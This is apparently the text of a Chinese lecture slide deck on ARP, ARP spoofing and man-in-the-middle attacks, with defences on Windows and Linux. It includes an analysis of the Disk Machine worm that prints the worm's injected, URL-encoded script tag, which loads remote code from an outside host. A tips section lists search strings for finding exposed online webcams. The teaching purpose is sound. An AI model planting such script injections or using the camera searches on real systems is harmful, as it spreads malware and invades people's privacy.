ARP病毒原理與防御措施课件.pptVIP

ARP病毒原理与防御措施 报告人：刘鑫 目录 什么是ARP ARP协议的漏洞 ARP欺骗原理 Windows与Linux的解决办法 Cookie 什么是ARP ARP (Address Resolution Protocol ) 地址解析协议 作用：IP--?MAC的转换 (什么是MAC？) 简单来说： 任何方式的访问都会事先发一次arp的请求 ARP的工作方式 1.我是A，我的IP是，我的MAC是11:11:11:11:11:11,如果你的ip是，请回答你的MAC 所有的主机都会收到这个请求，不过只有目的主机会做出回答。 2.我的IP是，我的MAC是22:22:22:22:22:22. ARP的工作方式 ARP帧格式 小问题： ARP工作在哪一层？什么是RARP和 IARP？ 两种特殊的ARP 代理ARP 从一个网络发送ARP请求时，路由器欺骗主机自己就是目的地。 免费ARP 发给自己的ARP，一般发生在系统引导时，来获得借口的MAC地址。有的系统不支持！ ARP协议漏洞 漏洞的根源就是ARP协议是无连接的 没有ARP的请求也可以ARP回复.最致命的就是操作系统收到这个请求后就会更新ARP缓存。 Solaris的特点。 ARP请求也可以伪造。 ARP主机的缓存中毒！ ARP的单向欺骗 ARP的中间人攻击 防范措施 由于ARP漏洞是协议的漏洞，不隶属于某个操作系统，所以很难进行防御。 Windows下的措施 arp –s意味着什么？ Arp –s 54 00-d0-f8-e3-ba-e9 安装arp防火墙 （360的ARP防火墙不安全） Linux下的措施 （正在研究中） 编辑/etc/ethers Arp –f 这种静态绑定在DHCP环境下无法工作！ 磁碟机病毒分析 症状： 杀毒软件运行不了必须全盘格式化才能完全清楚病毒刚重新装的系统又中毒了 病毒名称： 磁碟机病毒 病毒名称英文：Worm.DiskGen 病毒类型：感染型 危险级别：★★★☆ 传播方式：U盘 受影响的系统： Windows 2000, XP, 2003 未受影响的系统：Windows 3.x, Unix, Linux??1 破坏本机杀毒软件运行，删除本机杀毒软件服务、驱动等。 2 感染本机 .exe, .htm, .html, .js, .rar, .zip文件。 3 释放DLL文件，注册COM组件，弹出广告，下载其他病 毒、木马。 4 中毒后系统无法进入安全模式、组策略功能也被禁用。 磁碟机病毒分析 在html文件尾中加入 document.write(“ ScRiPt src=http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70 /sCrIpT “); Decode后 document.write(ScRiPt src=/01.asp /sCrIpT); 磁碟机病毒分析 多种传播方法的结合体： U盘传播 正确的磁盘打开方式 Arp传播 开启ARP防火墙 破环安全模式 修复 破坏进程查看工具 通过权限破环U盘免疫 Some Cookies Google的使用技巧 1 imgtype=face 只搜索人脸 2 inurl:web 3 filetype:pdf web 4 site: 网络中心 5 在线摄像头 sample/LvAppl 、 control/userimage Some Cookies 把桌面放到D盘 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders 防止由于系统崩溃导致重要文件丢失 谢谢！ 祝李老师一路顺风 * * * * *